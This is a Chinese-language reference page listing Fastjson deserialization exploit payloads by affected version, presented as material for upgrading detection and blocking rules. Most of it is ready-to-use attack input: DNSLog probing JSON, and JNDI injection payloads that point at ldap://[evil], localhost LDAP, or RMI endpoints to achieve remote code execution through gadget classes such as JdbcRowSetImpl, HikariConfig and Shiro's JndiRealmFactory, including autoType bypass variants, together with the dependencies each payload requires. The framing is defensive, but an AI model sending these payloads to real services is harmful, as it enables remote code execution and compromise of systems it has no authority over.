Fastjson漏洞利用代码分析(检测规则参考)

截止2020年8月21日,根据公开信息,Fastjson <=1.2.68版本均可能存在严重漏洞。

以下是fastjson漏洞的利用代码,可作为参考,进行检测规则的升级

Fastjson漏洞的利用代码

以下漏洞利用代码可用于探测后端是否使用了fastjson,是攻击者打点入侵的前兆,建议做【检测】处理(其中:dnslog往往是外部的域名或链接),每一行的json都是一个可能有效的payload

{"@type":"java.net.Inet4Address","val":"dnslog"}
{"@type":"java.net.Inet6Address","val":"dnslog"}
{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}
{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"dnslog"}}""}
{{"@type":"java.net.URL","val":"dnslog"}:"aaa"}
Set[{"@type":"java.net.URL","val":"dnslog"}]
Set[{"@type":"java.net.URL","val":"dnslog"}
{{"@type":"java.net.URL","val":"dnslog"}:0

以下漏洞利用代码被服务端成功解析后,会导致远程命令执行,危害极大,建议做【封禁】处理。

注意:下文中,RCE代表Remote Code Execution(远程代码执行)

HadoopHikari RCE(<= 1.2.68)

fastjson <= 1.2.68 RCE,需要开启 AutoType 依赖库:

<dependency>
    <groupId>org.apache.hadoop</groupId>
    <artifactId>hadoop-client-minicluster</artifactId>
    <version>3.2.1</version>
</dependency>

漏洞利用代码

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://[evil]/Calc"}


{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://[evil]/1pndqv"}

Shiro RCE(<= 1.2.66)(高频率)

fastjson <= 1.2.66 RCE,需要开启 AutoType

依赖shiro-core,即

<dependency>
    <groupId>org.apache.shiro</groupId>
    <artifactId>shiro-core</artifactId>
</dependency>

漏洞利用代码

{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory", "jndiNames":["ldap://localhost:43658/Calc"], "Realms":[""]}

JndiConverter RCE(<= 1.2.62)

fastjson 版本小于<= 1.2.62 RCE,需要开启AutoType,且依赖XBean-reflect ,即

<dependency>
    <groupId>org.apache.xbean</groupId>
    <artifactId>xbean-reflect</artifactId>
</dependency>

漏洞利用代码

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://localhost:43658/Calc"}

IbatisSqlmap RCE(<= 1.2.62)

fastjson <= 1.2.62 RCE,需要开启AutoType,且需要如下依赖

<dependency>
    <groupId>org.apache.ibatis</groupId>
    <artifactId>ibatis-sqlmap</artifactId>
    <version>2.3.4.726</version>
</dependency>
<dependency>
    <groupId>javax</groupId>
    <artifactId>javaee-api</artifactId>
    <version>8.0.1</version>
</dependency>

漏洞利用代码

{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://localhost:43658/Calc"}}

CocoonSlide RCE(<= 1.2.62)

fastjson <= 1.2.62 RCE,需要开启AutoType,且因为引用了javax/jms/JMSException类,所以必须在javaee环境下,需要如下依赖

<dependency>
    <groupId>slide</groupId>
    <artifactId>slide-kernel</artifactId>
    <version>2.1</version>
</dependency>
<dependency>
    <groupId>cocoon</groupId>
    <artifactId>cocoon-slide</artifactId>
    <version>2.1.11</version>
</dependency>

漏洞利用代码

{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor", "parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://127.0.0.1:43658/Calc"}, "namespace":""}

Anteros RCE(<=1.2.62)

fastjson <= 1.2.62 RCE,需要开启 AutoType,且需要如下依赖

<dependency>
    <groupId>com.codahale.metrics</groupId>
    <artifactId>metrics-healthchecks</artifactId>
    <version>3.0.2</version>
</dependency>
<dependency>
    <groupId>br.com.anteros</groupId>
    <artifactId>Anteros-Core</artifactId>
    <version>1.2.1</version>
</dependency>
<dependency>
    <groupId>br.com.anteros</groupId>
    <artifactId>Anteros-DBCP</artifactId>
    <version>1.0.1</version>
</dependency>

漏洞利用代码

{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://localhost:43658/Calc"}

CommonsProxy RCE(<=1.2.61)

CommonsProxy fastjson <= 1.2.61 RCE,需要开启AutoType,需要如下依赖

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-proxy</artifactId>
</dependency>

漏洞利用代码

{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://localhost:43658/Calc","Object":"a"}

HikariConfig RCE(<=1.2.59)

fastjson <= 1.2.59 RCE,需要开启 AutoType,需要如下依赖

<dependency>
    <groupId>com.zaxxer</groupId>
    <artifactId>HikariCP</artifactId>
</dependency>

漏洞利用代码

{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:43658/Calc"}

{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://localhost:43658/Calc"}

JdbcRowSetImpl RCE(<= 1.2.48)(常用)

fastjson 1.2.48 以下不需要任何配置或依赖,默认配置通杀 RCE

漏洞利用代码

[{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://localhost:43658/Calc","autoCommit":true}]

1.2.47以下版本漏洞利用代码

版本 Payload

1.2.24
{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit", "autoCommit":true}}

未知版本(1.2.24-41之间)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.41
{"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}

1.2.42
{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true};

1.2.43
{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true]}

1.2.45
{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://localhost:1099/Exploit"}}

1.2.47
{"a":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}

参考链接

Fastjson 漏洞利用

security_update_20200601-安全公告20200601

update_faq_20190722-FASTJSON升级常见问题解答

Copyright © aaron 2023 all right reserved,powered by Gitbook该文章修订时间: 2023-06-06 12:57:41

results matching ""

    No results matching ""